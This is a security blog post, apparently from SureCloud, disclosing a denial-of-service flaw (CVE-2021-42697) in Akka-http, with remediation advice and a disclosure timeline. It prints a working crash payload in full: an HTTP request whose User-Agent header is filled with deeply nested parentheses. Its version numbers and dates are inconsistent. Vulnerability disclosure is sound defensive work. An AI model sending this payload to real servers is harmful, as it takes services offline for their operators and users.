Vector
Vector

Choose your topics

Blogs
The GRC Trends to Look Out for in 2024

Our GRC experts at SureCloud share their 2024 predictions for the world of governance, risk and compliance.

GRC
Blogs
The Top 5 Challenges of Third-Party Risk Management

With the supply chain now seen as a legitimate attack path, what can your organization do? Let’s explore 5 challenges of TPRM and how to overcome them.

Third-Party Risk Management GRC
Blogs
What is Third-Party Risk Management?

What is third-party risk management and how should you approach it? Find out in this post.

Third-Party Risk Management GRC
Blogs
The Top 4 Challenges of Risk Management

What are the top four challenges of risk management today and how can you overcome them? Find out in this post from SureCloud.

Third-Party Risk Management GRC
Blogs
Transform Compliance into Your Competitive Advantage

In GRC, compliance is often viewed as a cost that makes it harder to pursue growth. Here's how to make it your competitive advantage.

Compliance Management GRC
Blogs
Questions You Should Ask when Preparing For Your First Pen Test

Understand the processes that you and your chosen pentest provider will travel through for your first pen test, from the initial point to the day the test starts.

Penetration Testing
Blogs
TPRM Blog 6-Writing Clear Questions

Our GRC Practice Director explores the importance of clear communication and how to achieve it in your third party questionnaires. Read more here.

Third-Party Risk Management GRC
Blogs
The Simple Way to Combat Phishing

SureCloud Cybersecurity Practice Director Luke Potter shares his tip to stay ahead of attackers phishing for your downfall.

Penetration Testing
Blogs
See Yourself in Cyber With Janhavi Deshpande

See Yourself in Cyber With Janhavi Deshpande - SureCloud

Cyber Security
Vector (7)
Vector-1
Cyber Security

DoS Vulnerability in Akka-http <= 10.2.5

DoS Vulnerability in Akka-http <= 10.2.5
Written by

Simone Q

Published on

12 Sep 2021

DoS Vulnerability in Akka-http <= 10.2.6

 

TL;DR

SureCloud identified a denial of service (DoS) vulnerability in Akka-http prior to 10.2.6. An Akka-http application that is exposed to the Internet can be remotely crashed by sending a crafter User-Agent header leading to a loss of availability. At the moment of writing, there are around 10k Akka-http servers exposed on the Internet (according to Shodan.io – https://www.shodan.io/search?query=Server%3A+akka-http) 

The following article aims to provide a technical overview of the identified vulnerability.

Test Environment

Akka is a free and open-source toolkit and runtime simplifying the construction of concurrent and distributed applications on the JVM. It is developed and maintained by Lightbend. The project’s URL is https://akka.io and it has more than 11k stars and 3k forks on GitHub (https://github.com/akka/akka).

The test environment used during the discovery was as follow:

  • akka-http-quickstart-scala.g8 running on Java 11.0.12
  • Scala sbt 1.5.5
  • Scala 2.12.14
  • akka-http 10.2.6

CVE-2021-42697 (DoS in akka-http)

The consultant observed that while parsing a request containing a `User-Agent` header with deeply nested comments, Akka HTTP may fail with a stack overflow in the parser. Stack overflows are handled as fatal errors in Akka leading to a complete shutdown of the application.

The malformed request that could cause the stack overflow error is:

GET /users HTTP/1.1

Host: localhost:8080

User-Agent: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((

Remediation

Starting from Akka 10.2.7, parsing of nested comments will be limited to a configurable maximum depth. All clients using the akka-http web technology are strongly advices to upgrade as soon as possible.

Disclosure Timeline:

13/10/2021: Bugs identified and details sent to Lightbend
14/10/2021: Vulnerability acknowledged by Lightbend
02/11/2021: Akka http 10.2.7 released
09/12/2021: This blog post published